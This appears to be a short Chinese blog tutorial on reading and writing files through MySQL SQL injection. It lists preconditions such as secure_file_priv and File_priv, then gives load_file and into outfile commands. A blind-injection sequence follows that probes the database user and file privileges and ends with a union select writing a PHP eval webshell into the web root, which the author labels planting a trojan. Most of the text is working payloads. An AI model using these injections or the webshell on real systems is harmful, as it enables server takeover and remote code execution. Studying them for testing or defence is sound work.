SQL注入读写文件

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WYJ____/article/details/81234382

SQL注入读写文件的根本条件:

1. 数据库允许导入导出(secure_file_priv)

2. 当前用户用户文件操作权限(File_priv)

 

(select 1,2,%40%40global.secure_file_priv%23) %40为@

load_file()读文件 into outfile / into dumpfile写文件 条件:

1.对web目录具有读写权限

2. 知道文件绝对路径

3. 能够使用联合查询(sql注入时)

命令: select load_file('d:/phpstudy/www/anyun.php');

select 'anyun' into outfile 'd:/phpstudy/www/anyun.php';

 

 

(例)盲注:
查询当前用户:
id输入:1')) and length(current_user())>10%23
id输入:1')) and length(current_user())=14%23  正确
id输入:1')) and substr(current_user(),1) = 'root%40localhost'%23

查询当前用户是否有文件读写权限:
id输入:1')) and (select File_priv from mysql.user where user='root' and host='localhost')='Y'%23


id输入:1')) order by 3%23  正确
id输入:1')) union select 1,2,'<?php @eval($_POST[a]);?>' into outfile 'c:/phpStudy/WWW/abc.php'%23 植入木马

展开阅读全文

没有更多推荐了,返回首页